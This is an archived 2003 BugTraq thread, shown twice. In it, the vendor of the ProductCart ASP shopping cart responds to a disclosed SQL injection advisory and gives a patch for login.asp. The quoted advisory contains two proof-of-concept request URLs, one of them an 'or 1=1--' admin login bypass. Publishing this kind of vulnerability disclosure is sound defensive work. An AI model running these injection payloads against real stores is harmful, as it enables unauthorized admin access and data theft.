BugTraq
Back to list
|
Post reply
Re: Another ProductCart SQL Injection Vulnerability
Jul 07 2003 07:59PM
Massimo Arrigoni (support earlyimpact com)
In-Reply-To: <20030705063915.10225.qmail (at) www.securityfocus (dot) com [email concealed]>
Additional information on how to better protect a ProductCart-powered
store, and specifically on how to avoid unauthorized access to stores
using a MS Access database, is available at this address:
http://www.earlyimpact.com/pdf/ProductCart_Security_Tips.pdf
In addition, security updates and other support information for
ProductCart users is always available at the ProductCart Support Center,
located at the following address:
http://www.earlyimpact.com/productcart/support/
If you have any questions, please contact Early Impact at
support (at) earlyimpact (dot) com [email concealed]
The Early Impact Team
>Received: (qmail 22231 invoked from network); 7 Jul 2003 19:30:29 -0000
>Received: from outgoing3.securityfocus.com (205.206.231.27)
> by mail.securityfocus.com with SMTP; 7 Jul 2003 19:30:29 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 301F4A3236; Mon, 7 Jul 2003 13:14:55 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 25343 invoked from network); 5 Jul 2003 06:37:54 -0000
>Date: 5 Jul 2003 06:39:15 -0000
>Message-ID: <20030705063915.10225.qmail (at) www.securityfocus (dot) com [email concealed]>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: Massimo Arrigoni <support (at) earlyimpact (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Re: Another ProductCart SQL Injection Vulnerability
>
>In-Reply-To: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>
>
>Instructions on how to address this security issue:
>
>-------------------------------------------------------------------
>
>User of ProductCart v1.5 and before:
>Please contact Early Impact ASAP to update to a later version of
>ProductCart. Send a message to support (at) earlyimpact (dot) com. [email concealed] The update is
free.
>
>-------------------------------------------------------------------
>
>User of ProductCart v1.6:
>Open the file "pcadmin/login.asp" and replace the following lines:
>
>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pAdminPassword=enDeCrypt(request.querystring("adminPassword"),
scCrypPass)
>
>with
>
>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pIdAdmin=replace(pIdAdmin,"--","")
>If NOT isNumeric(pIdAdmin) then
>response.redirect "msg.asp?message=1"
>response.end
>end if pAdminPassword=enDeCrypt(request.querystring("adminPassword"),
>scCrypPass)
>
>-------------------------------------------------------------------
>
>Users of ProductCart v2:
>Replace "pcadmin/login.asp" with an updated version of this file that
you
>can request immediately by contacting Early Impact at
>support (at) earlyimpact (dot) com [email concealed]
>
>-------------------------------------------------------------------
>
>We have already notified all ProductCart resellers of the above. We will
>also notify within the next few hours all ProductCart users that have
>purchased the software directly from us.
>
>At Early Impact we are working day and night to make our application as
>secure as it can be. If you have any questions, please contact us at
>support (at) earlyimpact (dot) com [email concealed]
>
>Best Regards,
>
>The Early Impact Team
>
>
>>Received: (qmail 20442 invoked from network); 4 Jul 2003 14:55:16 -0000
>>Received: from outgoing3.securityfocus.com (205.206.231.27)
>> by mail.securityfocus.com with SMTP; 4 Jul 2003 14:55:16 -0000
>>Received: from lists.securityfocus.com (lists.securityfocus.com
>[205.206.231.19])
>> by outgoing3.securityfocus.com (Postfix) with QMQP
>> id E4498A3228; Fri, 4 Jul 2003 08:56:07 -0600 (MDT)
>>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>>Precedence: bulk
>>List-Id: <bugtraq.list-id.securityfocus.com>
>>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>>Received: (qmail 13256 invoked from network); 4 Jul 2003 03:28:46 -0000
>>X-Qmail-Scanner-Mail-From: mobile (at) bosen (dot) net [email concealed] via prambanan.java.net.id
>>X-Qmail-Scanner: 1.16 (Clear:SA:0(0.0/5.0):. Processed in 0.586905 secs)
>>Message-ID: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>
>>Date: Fri, 4 Jul 2003 10:30:39 +0700
>>From: Bosen <mobile (at) bosen (dot) net [email concealed]>
>>To: bugs (at) securitytracker (dot) com [email concealed], bugtraq (at) securityfocus (dot) com [email concealed]
>>Subject: Another ProductCart SQL Injection Vulnerability
>>MIME-Version: 1.0
>>Content-Type: text/plain; charset=ISO-8859-1
>>Content-Transfer-Encoding: 8bit
>>X-Originating-IP: 202.73.121.173
>>X-Errot-Report-To: Agus Supriadhie <bosen (at) antionline (dot) org [email concealed]>
>>X-Version: 3.1
>>X-Spam-Status: No, hits=0.0 required=5.0
>> tests=none
>> version=2.55
>>X-Spam-Level:
>>X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)
>>
>>ProductCart SQL Injection Vulnerability
>>______________________________________________________________________
__
__
>_____
>>
>>
>>1ndonesian Security Team (1st)
>>http://bosen.net/releases/
>>======================================================================
==
==
>=====
>>Security Advisory
>>
>>
>>
>>Advisory Name: ProductCart SQL Injection Vulnerability
>> Release Date: 06/20/2003
>> Application:
>> ProductCart v1.5
>> ProductCart v1.5002
>> ProductCart v1.5003
>> ProductCart v1.5003r
>> ProductCart v1.5004
>> ProductCart v1.6b
>> ProductCart v1.6br
>> ProductCart v1.6br001
>> ProductCart v1.6br003
>> ProductCart v1.6b001
>> ProductCart v1.6b002
>> ProductCart v1.6b003
>> ProductCart v1.6002
>> ProductCart v1.6003
>> ProductCart v2
>> ProductCart v2br000
>> Platform: Win32/MSSQL
>> Severity: High
>> BUG Type: SQL Injection
>> Author: Bosen <mobile (at) bosen (dot) net [email concealed]>
>> Discover by: Bosen <mobile (at) bosen (dot) net [email concealed]>
>>Vendor Status: See below.
>> Vendor URL: http://www.earlyimpact.com/
>> Reference: http://bosen.net/releases/
>>
>>
>>
>>Overview:
>>From the web
>>"ProductCart® is an ASP shopping cart that combines sophisticated
>ecommerce
>>features with time-saving store management tools and remarkable ease of
>use."
>>From the author
>>"Even the application is not Open Source, but we can 'debug' the
>application
>>on the fly. And with SQL Injection we can query some information about
>the
>>tables
>>and database, even the data it self. With more work will couse ability
to
>>access into
>>the admin control panel site."
>>
>>
>>
>>Details:
>>The error msg of the application handled very good, but not that good.
>Couse
>>still have
>>XSS injection vulnerbility (read my previous advisories). Those error
>handler
>>would make
>>exploitation very difficult to do.
>>But, not all script handled by those error handler script.
>>For example Custva.asp, its still vulnerable to SQL Injection.
>>
>>But the worst is, on the admin control panel which is can be injected
by
>old
>>famous
>>SQL injection 'or 1=1--'. Which makes you able to get access into admin
>>control panel
>>without needing any access.
>>
>>
>>
>>Exploits/POC:
>>file Custva.asp
>>http://<target>/productcart/pc/Custvb.asp?redirectUrl=&Email=%
27+having+1%
>3D1--
>>&_email=email
>>&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
>>
>>file login.asp
>>http://<target>/produccart/pdacmin/login.asp?idadmin='' or 1=1--
>>
>>
>>
>>Vendor Response:
>>Contacted. No response yet.
>>
>>
>>
>>Recommendation:
>>No recommendation for this.
>>
>>
>>
>>1ndonesian Security Team (1st) Advisory:
>>http://bosen.net/releases/
>>
>>
>>
>>About 1ndonesian Security Team:
>>1ndonesian Security Team, research and develop intelligent, advanced
>>application
>>security assessment. Based in Indonesia, 1ndonesian Security Team
offers
>best
>>of
>>breed security consulting services, specialising in application, host
and
>>network
>>security assessments.
>>
>>1st provides security information and patches for use by the entire 1st
>>community.
>>
>>This information is provided freely to all interested parties and may
be
>>redistributed provided that it is not altered in any way, 1st is
>appropriately
>>credited and the document retains.
>>
>>
>>Greetz to:
>>AresU, TioEuy, sakitjiwa, muthafuka, alphacentury
>>All 1ndonesian Security Team - #hackers (at) austnet (dot) org [email concealed]/centrin.net.id
>>
>>
>>
>>
>>
>>
>>
>>Bosen <mobile (at) bosen (dot) net [email concealed]>
>>======================
>>Original document can be fount at http://bosen.net/releases/?id=40
>>
>>
>>
>
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Additional information on how to better protect a ProductCart-powered
store, and specifically on how to avoid unauthorized access to stores
using a MS Access database, is available at this address:
http://www.earlyimpact.com/pdf/ProductCart_Security_Tips.pdf
In addition, security updates and other support information for
ProductCart users is always available at the ProductCart Support Center,
located at the following address:
http://www.earlyimpact.com/productcart/support/
If you have any questions, please contact Early Impact at
support (at) earlyimpact (dot) com [email concealed]
The Early Impact Team
>Received: (qmail 22231 invoked from network); 7 Jul 2003 19:30:29 -0000
>Received: from outgoing3.securityfocus.com (205.206.231.27)
> by mail.securityfocus.com with SMTP; 7 Jul 2003 19:30:29 -0000
>Received: from lists.securityfocus.com (lists.securityfocus.com
[205.206.231.19])
> by outgoing3.securityfocus.com (Postfix) with QMQP
> id 301F4A3236; Mon, 7 Jul 2003 13:14:55 -0600 (MDT)
>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>Precedence: bulk
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>Received: (qmail 25343 invoked from network); 5 Jul 2003 06:37:54 -0000
>Date: 5 Jul 2003 06:39:15 -0000
>Message-ID: <20030705063915.10225.qmail (at) www.securityfocus (dot) com [email concealed]>
>Content-Type: text/plain
>Content-Disposition: inline
>Content-Transfer-Encoding: binary
>MIME-Version: 1.0
>X-Mailer: MIME-tools 5.411 (Entity 5.404)
>From: Massimo Arrigoni <support (at) earlyimpact (dot) com [email concealed]>
>To: bugtraq (at) securityfocus (dot) com [email concealed]
>Subject: Re: Another ProductCart SQL Injection Vulnerability
>
>In-Reply-To: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>
>
>Instructions on how to address this security issue:
>
>-------------------------------------------------------------------
>
>User of ProductCart v1.5 and before:
>Please contact Early Impact ASAP to update to a later version of
>ProductCart. Send a message to support (at) earlyimpact (dot) com. [email concealed] The update is
free.
>
>-------------------------------------------------------------------
>
>User of ProductCart v1.6:
>Open the file "pcadmin/login.asp" and replace the following lines:
>
>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pAdminPassword=enDeCrypt(request.querystring("adminPassword"),
scCrypPass)
>
>with
>
>pIdAdmin=replace(request.querystring("IdAdmin"),"'","''")
>pIdAdmin=replace(pIdAdmin,"--","")
>If NOT isNumeric(pIdAdmin) then
>response.redirect "msg.asp?message=1"
>response.end
>end if pAdminPassword=enDeCrypt(request.querystring("adminPassword"),
>scCrypPass)
>
>-------------------------------------------------------------------
>
>Users of ProductCart v2:
>Replace "pcadmin/login.asp" with an updated version of this file that
you
>can request immediately by contacting Early Impact at
>support (at) earlyimpact (dot) com [email concealed]
>
>-------------------------------------------------------------------
>
>We have already notified all ProductCart resellers of the above. We will
>also notify within the next few hours all ProductCart users that have
>purchased the software directly from us.
>
>At Early Impact we are working day and night to make our application as
>secure as it can be. If you have any questions, please contact us at
>support (at) earlyimpact (dot) com [email concealed]
>
>Best Regards,
>
>The Early Impact Team
>
>
>>Received: (qmail 20442 invoked from network); 4 Jul 2003 14:55:16 -0000
>>Received: from outgoing3.securityfocus.com (205.206.231.27)
>> by mail.securityfocus.com with SMTP; 4 Jul 2003 14:55:16 -0000
>>Received: from lists.securityfocus.com (lists.securityfocus.com
>[205.206.231.19])
>> by outgoing3.securityfocus.com (Postfix) with QMQP
>> id E4498A3228; Fri, 4 Jul 2003 08:56:07 -0600 (MDT)
>>Mailing-List: contact bugtraq-help (at) securityfocus (dot) com [email concealed]; run by ezmlm
>>Precedence: bulk
>>List-Id: <bugtraq.list-id.securityfocus.com>
>>List-Post: <mailto:bugtraq (at) securityfocus (dot) com [email concealed]>
>>List-Help: <mailto:bugtraq-help (at) securityfocus (dot) com [email concealed]>
>>List-Unsubscribe: <mailto:bugtraq-unsubscribe (at) securityfocus (dot) com [email concealed]>
>>List-Subscribe: <mailto:bugtraq-subscribe (at) securityfocus (dot) com [email concealed]>
>>Delivered-To: mailing list bugtraq (at) securityfocus (dot) com [email concealed]
>>Delivered-To: moderator for bugtraq (at) securityfocus (dot) com [email concealed]
>>Received: (qmail 13256 invoked from network); 4 Jul 2003 03:28:46 -0000
>>X-Qmail-Scanner-Mail-From: mobile (at) bosen (dot) net [email concealed] via prambanan.java.net.id
>>X-Qmail-Scanner: 1.16 (Clear:SA:0(0.0/5.0):. Processed in 0.586905 secs)
>>Message-ID: <1057289439.3f04f4dfaf159 (at) webmail.bosen (dot) net [email concealed]>
>>Date: Fri, 4 Jul 2003 10:30:39 +0700
>>From: Bosen <mobile (at) bosen (dot) net [email concealed]>
>>To: bugs (at) securitytracker (dot) com [email concealed], bugtraq (at) securityfocus (dot) com [email concealed]
>>Subject: Another ProductCart SQL Injection Vulnerability
>>MIME-Version: 1.0
>>Content-Type: text/plain; charset=ISO-8859-1
>>Content-Transfer-Encoding: 8bit
>>X-Originating-IP: 202.73.121.173
>>X-Errot-Report-To: Agus Supriadhie <bosen (at) antionline (dot) org [email concealed]>
>>X-Version: 3.1
>>X-Spam-Status: No, hits=0.0 required=5.0
>> tests=none
>> version=2.55
>>X-Spam-Level:
>>X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)
>>
>>ProductCart SQL Injection Vulnerability
>>______________________________________________________________________
__
__
>_____
>>
>>
>>1ndonesian Security Team (1st)
>>http://bosen.net/releases/
>>======================================================================
==
==
>=====
>>Security Advisory
>>
>>
>>
>>Advisory Name: ProductCart SQL Injection Vulnerability
>> Release Date: 06/20/2003
>> Application:
>> ProductCart v1.5
>> ProductCart v1.5002
>> ProductCart v1.5003
>> ProductCart v1.5003r
>> ProductCart v1.5004
>> ProductCart v1.6b
>> ProductCart v1.6br
>> ProductCart v1.6br001
>> ProductCart v1.6br003
>> ProductCart v1.6b001
>> ProductCart v1.6b002
>> ProductCart v1.6b003
>> ProductCart v1.6002
>> ProductCart v1.6003
>> ProductCart v2
>> ProductCart v2br000
>> Platform: Win32/MSSQL
>> Severity: High
>> BUG Type: SQL Injection
>> Author: Bosen <mobile (at) bosen (dot) net [email concealed]>
>> Discover by: Bosen <mobile (at) bosen (dot) net [email concealed]>
>>Vendor Status: See below.
>> Vendor URL: http://www.earlyimpact.com/
>> Reference: http://bosen.net/releases/
>>
>>
>>
>>Overview:
>>From the web
>>"ProductCart® is an ASP shopping cart that combines sophisticated
>ecommerce
>>features with time-saving store management tools and remarkable ease of
>use."
>>From the author
>>"Even the application is not Open Source, but we can 'debug' the
>application
>>on the fly. And with SQL Injection we can query some information about
>the
>>tables
>>and database, even the data it self. With more work will couse ability
to
>>access into
>>the admin control panel site."
>>
>>
>>
>>Details:
>>The error msg of the application handled very good, but not that good.
>Couse
>>still have
>>XSS injection vulnerbility (read my previous advisories). Those error
>handler
>>would make
>>exploitation very difficult to do.
>>But, not all script handled by those error handler script.
>>For example Custva.asp, its still vulnerable to SQL Injection.
>>
>>But the worst is, on the admin control panel which is can be injected
by
>old
>>famous
>>SQL injection 'or 1=1--'. Which makes you able to get access into admin
>>control panel
>>without needing any access.
>>
>>
>>
>>Exploits/POC:
>>file Custva.asp
>>http://<target>/productcart/pc/Custvb.asp?redirectUrl=&Email=%
27+having+1%
>3D1--
>>&_email=email
>>&password=asd&_password=required&Submit.x=33&Submit.y=5&Submit=Submit
>>
>>file login.asp
>>http://<target>/produccart/pdacmin/login.asp?idadmin='' or 1=1--
>>
>>
>>
>>Vendor Response:
>>Contacted. No response yet.
>>
>>
>>
>>Recommendation:
>>No recommendation for this.
>>
>>
>>
>>1ndonesian Security Team (1st) Advisory:
>>http://bosen.net/releases/
>>
>>
>>
>>About 1ndonesian Security Team:
>>1ndonesian Security Team, research and develop intelligent, advanced
>>application
>>security assessment. Based in Indonesia, 1ndonesian Security Team
offers
>best
>>of
>>breed security consulting services, specialising in application, host
and
>>network
>>security assessments.
>>
>>1st provides security information and patches for use by the entire 1st
>>community.
>>
>>This information is provided freely to all interested parties and may
be
>>redistributed provided that it is not altered in any way, 1st is
>appropriately
>>credited and the document retains.
>>
>>
>>Greetz to:
>>AresU, TioEuy, sakitjiwa, muthafuka, alphacentury
>>All 1ndonesian Security Team - #hackers (at) austnet (dot) org [email concealed]/centrin.net.id
>>
>>
>>
>>
>>
>>
>>
>>Bosen <mobile (at) bosen (dot) net [email concealed]>
>>======================
>>Original document can be fount at http://bosen.net/releases/?id=40
>>
>>
>>
>
[ reply ]